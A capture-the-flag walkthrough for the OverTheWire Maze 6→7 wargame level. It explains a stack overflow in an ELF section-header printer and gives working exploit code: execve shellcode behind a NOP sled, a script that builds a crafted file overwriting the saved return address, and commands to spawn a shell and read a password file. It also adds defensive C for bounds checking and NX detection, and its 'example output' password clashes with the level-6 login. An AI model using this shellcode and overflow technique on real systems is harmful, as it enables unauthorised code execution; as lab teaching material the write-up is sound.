Part-time CTF player, learning every day!!
🌠 I Love Hoshimachi Suisei!! 🌠

OverTheWire Maze Level 6 → 7 tutorial!!

Login

Use the maze6 account from the previous level.

ssh maze6@maze.labs.overthewire.org -p <PORT>
# password: pohninieng

Binary for this challenge: /maze/maze7


Task

Abuse the unsafe buffer handling in Print_Shdrs() to overflow the stack and redirect execution to our shellcode in the environment.


A little bit of Theory

The program loads ELF headers and prints section headers:

  • main reads the ELF header, then calls Print_Shdrs().
  • Inside Print_Shdrs, there’s a local dummy buffer at ebp-60.
  • Then comes this dangerous line:
read(fd, p, size);

Where p = &dummy, so if size > 60 the read runs past the buffer and overflows the stack frame, smashing the saved EIP.

Key notes:

  • By controlling size, we control how far we overwrite.
  • Setting size = 0x44 (68) makes it overwrite saved EIP cleanly: 60 bytes of buffer + 4 bytes of saved EBP + 4 bytes of saved EIP.
  • Other parameters (num, shstrndx, etc.) don’t matter if we make them zero.
  • We only need the loop to run once, so num = 0.
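As an added illustration (not code from the maze7 binary or from this writeup), here is the read() pattern described above next to a bounds-checked form in C. The 60-byte buffer mirrors the ebp-60 dummy buffer; read_full, read_shdr_checked and try_size are hypothetical names, and the 0x44-byte record pushed through the pipe is constructed filler standing in for a crafted input file.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Local buffer length, matching the ebp-60 dummy buffer in the writeup. */
#define DUMMY_LEN 60

/* Read exactly n bytes from fd into buf. Returns 0 on success, -1 on EOF
 * or error; short reads are retried instead of being silently accepted. */
static int read_full(int fd, void *buf, size_t n)
{
    unsigned char *p = buf;
    while (n > 0) {
        ssize_t r = read(fd, p, n);
        if (r < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (r == 0)
            return -1;          /* EOF before the record was complete */
        p += r;
        n -= (size_t)r;
    }
    return 0;
}

/* Hardened form of the read in Print_Shdrs(): the file-controlled size is
 * validated against the real buffer length before read() is called, so a
 * size such as 0x44 can never reach past the 60-byte buffer into saved
 * EBP/EIP. Returns 0 on success, -1 (errno = EINVAL) if size is out of range.
 * The original, vulnerable form is simply read(fd, dummy, size) with no check. */
int read_shdr_checked(int fd, uint16_t size, unsigned char *dummy, size_t dummy_len)
{
    if (size == 0 || size > dummy_len) {
        errno = EINVAL;
        return -1;
    }
    return read_full(fd, dummy, size);
}

/* Hypothetical demo harness: push a constructed 0x44-byte record through a
 * pipe and request `size` bytes of it, as a crafted file would. Returns 0 if
 * the read was accepted, -1 if the bounds check rejected it, -2 on setup error. */
int try_size(uint16_t size)
{
    unsigned char dummy[DUMMY_LEN];
    unsigned char record[0x44];
    int fds[2];
    int rc;

    memset(record, 'A', sizeof record);     /* constructed filler, not real data */
    if (pipe(fds) != 0)
        return -2;
    if (write(fds[1], record, sizeof record) != (ssize_t)sizeof record) {
        close(fds[0]);
        close(fds[1]);
        return -2;
    }
    close(fds[1]);
    rc = read_shdr_checked(fds[0], size, dummy, sizeof dummy);
    close(fds[0]);
    return rc;
}

int main(void)
{
    printf("size=60   -> %s\n", try_size(60) == 0 ? "accepted" : "rejected");
    printf("size=0x44 -> %s\n", try_size(0x44) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The check sits before the read rather than after it because once read() has run, the saved return address is already gone; the same rule applies to any length field that arrives from the file being parsed.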

Step 1 — Prepare shellcode in the environment

Same trick as previous levels: store shellcode in $SC, padded with a NOP sled:

export SC=$(python - <<'PY'
import sys
# NOP sled followed by execve("/bin//sh") shellcode, written as raw bytes so
# that Python 3 does not UTF-8 encode the high bytes (\x90, \xcd, ...) on output.
sc = (b"\x90"*100 +
      b"\x31\xc0\x50\x68\x2f\x2f\x73\x68" +
      b"\x68\x2f\x62\x69\x6e" +
      b"\x89\xe3\x89\xc1\x89\xc2" +
      b"\xb0\x0b\xcd\x80" +
      b"\x31\xc0\x40\xcd\x80")
# works under both Python 2 (no .buffer) and Python 3
getattr(sys.stdout, "buffer", sys.stdout).write(sc)
PY
)

Step 2 — Craft a malicious ELF-like file

We need the file to:

  • Pass early ELF checks.
  • Trigger size = 0x44.
  • Place an overwrite for EIP pointing into $SC.

Minimal payload:

python - <<'PY' > hello
import sys
payload  = b"\x00"*32                # padding
payload += b"\x00\x00\x00\x00"       # offset values
payload += b"\x00"*10
payload += b"\x44\x00"               # size = 0x44 (little-endian 16-bit)
payload += b"\x00\x00"
payload += b"\x00\x00\x00\x00"
payload += b"\x00"*10
payload += b"\x0c\xdf\xff\xff"       # RET -> inside our env (adjust if needed)
# 32+4+10+2+2+4+10+4 = 68 = 0x44 bytes; write raw bytes so Python 3 does not
# UTF-8 encode \xdf\xff\xff (works under Python 2 as well)
getattr(sys.stdout, "buffer", sys.stdout).write(payload)
PY

Step 3 — Run the exploit

/maze/maze7 hello

If the return address correctly points into the NOP sled, execution slides into our shellcode, spawning a shell.


Step 4 — Grab the password

Inside the new shell:

id
cat /etc/maze_pass/maze7

Example output:

pohninieng

Why this works (tl;dr)

  • read(fd, p, size) writes size bytes into a small stack buffer.
  • With size = 0x44, we overwrite saved EIP.
  • We set EIP to point into our $SC NOP sled → shellcode runs.
  • From there, we spawn /bin/sh and read the next password.

Troubleshooting tips

  • If it crashes without shell: → Check that your return address (0xffffdf0c style) really points inside $SC. Use getenv("SC") in gdb.
  • If the loop runs too many times: → Ensure num = 0 in the crafted file.
  • If nothing happens: → Verify NX is off for /maze/maze7 (checksec). Otherwise, you need a ret2libc approach instead.
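The checksec step in the last tip can be reproduced without a third-party tool: the kernel decides whether a process gets an executable stack from the binary's PT_GNU_STACK program header, so the NX question is answered by reading that one entry. The following C is an added example, not code from the writeup or from OverTheWire; gnu_stack_flags, make_test_elf32 and check_constructed are hypothetical names, the ELF images are constructed in memory, and the parser assumes a little-endian host because it copies headers as structs. To check a real binary, read the file into memory and pass it to gnu_stack_flags.

```c
#include <elf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Result codes for gnu_stack_flags(). */
enum { STACK_NX = 0, STACK_EXEC = 1, STACK_UNKNOWN = -1 };

/* Report whether an in-memory ELF image asks for an executable stack via
 * PT_GNU_STACK (the "NX off" case). Handles ELF32 and ELF64 little-endian
 * files; assumes a little-endian host. A missing PT_GNU_STACK falls back to
 * the kernel's per-architecture default, so it is reported as STACK_UNKNOWN. */
int gnu_stack_flags(const unsigned char *img, size_t len)
{
    if (len < EI_NIDENT || memcmp(img, ELFMAG, SELFMAG) != 0 ||
        img[EI_DATA] != ELFDATA2LSB)
        return STACK_UNKNOWN;

    if (img[EI_CLASS] == ELFCLASS32) {
        Elf32_Ehdr eh;
        if (len < sizeof eh)
            return STACK_UNKNOWN;
        memcpy(&eh, img, sizeof eh);
        for (unsigned i = 0; i < eh.e_phnum; i++) {
            Elf32_Phdr ph;
            size_t off = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;
            if (eh.e_phentsize < sizeof ph || off + sizeof ph > len)
                return STACK_UNKNOWN;       /* truncated or malformed table */
            memcpy(&ph, img + off, sizeof ph);
            if (ph.p_type == PT_GNU_STACK)
                return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NX;
        }
    } else if (img[EI_CLASS] == ELFCLASS64) {
        Elf64_Ehdr eh;
        if (len < sizeof eh)
            return STACK_UNKNOWN;
        memcpy(&eh, img, sizeof eh);
        for (unsigned i = 0; i < eh.e_phnum; i++) {
            Elf64_Phdr ph;
            size_t off = (size_t)eh.e_phoff + (size_t)i * eh.e_phentsize;
            if (eh.e_phentsize < sizeof ph || off + sizeof ph > len)
                return STACK_UNKNOWN;
            memcpy(&ph, img + off, sizeof ph);
            if (ph.p_type == PT_GNU_STACK)
                return (ph.p_flags & PF_X) ? STACK_EXEC : STACK_NX;
        }
    }
    return STACK_UNKNOWN;
}

/* Build a minimal constructed ELF32 image (header plus one PT_GNU_STACK entry)
 * carrying the given p_flags, so the checker can be exercised without a real
 * binary. Returns the image length, or 0 if the buffer is too small. */
size_t make_test_elf32(unsigned char *out, size_t cap, uint32_t stack_flags)
{
    Elf32_Ehdr eh;
    Elf32_Phdr ph;
    if (cap < sizeof eh + sizeof ph)
        return 0;
    memset(&eh, 0, sizeof eh);
    memcpy(eh.e_ident, ELFMAG, SELFMAG);
    eh.e_ident[EI_CLASS] = ELFCLASS32;
    eh.e_ident[EI_DATA] = ELFDATA2LSB;
    eh.e_ident[EI_VERSION] = EV_CURRENT;
    eh.e_type = ET_EXEC;
    eh.e_machine = EM_386;
    eh.e_version = EV_CURRENT;
    eh.e_ehsize = sizeof eh;
    eh.e_phoff = sizeof eh;
    eh.e_phentsize = sizeof ph;
    eh.e_phnum = 1;
    memset(&ph, 0, sizeof ph);
    ph.p_type = PT_GNU_STACK;
    ph.p_flags = stack_flags;
    memcpy(out, &eh, sizeof eh);
    memcpy(out + sizeof eh, &ph, sizeof ph);
    return sizeof eh + sizeof ph;
}

/* Convenience: build a constructed image with stack_flags and check it. */
int check_constructed(uint32_t stack_flags)
{
    unsigned char img[128];
    size_t n = make_test_elf32(img, sizeof img, stack_flags);
    return n ? gnu_stack_flags(img, n) : STACK_UNKNOWN;
}

int main(void)
{
    printf("RWX stack -> %d (STACK_EXEC = %d)\n", check_constructed(PF_R | PF_W | PF_X), STACK_EXEC);
    printf("RW stack  -> %d (STACK_NX = %d)\n", check_constructed(PF_R | PF_W), STACK_NX);
    return 0;
}
```

STACK_EXEC corresponds to checksec reporting "NX disabled": the binary was linked with an executable stack request (for example from an assembly object lacking a .note.GNU-stack section), which is the hardening gap the troubleshooting tip asks you to confirm.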

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨
